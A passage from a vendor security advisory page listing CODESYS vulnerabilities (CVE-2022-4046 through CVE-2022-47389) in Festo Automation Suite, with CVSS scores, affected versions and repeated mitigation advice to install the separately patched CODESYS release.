https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-552 Files or Directories Accessible to External Parties Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-4046 In CODESYS Control in multiple versions a improper restriction of operations within the bounds of a memory buffer allow an remote attacker with user privileges to gain full access of the device. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.0 8.8 HIGH CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-4048 Inadequate Encryption Strength in CODESYS Development System V3 versions prior to V3.5.18.40 allows an unauthenticated local attacker to access and manipulate code of the encrypted boot application. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-326 Inadequate Encryption Strength Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVE-2022-4224 In multiple products of CODESYS v3 in multiple versions a remote low privileged user could utilize this vulnerability to read and modify system files and OS resources or DoS the device. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47378 Multiple CODESYS products in multiple versions are prone to a improper input validation vulnerability. An authenticated remote attacker may craft specific requests that use the vulnerability leading to a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-47379 An authenticated, remote attacker may use a out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into memory which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47380 An authenticated remote attacker may use a stack basedout-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47381 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47383 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47384 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47385 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpAppForce Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47386 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47387 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47388 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47389 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System 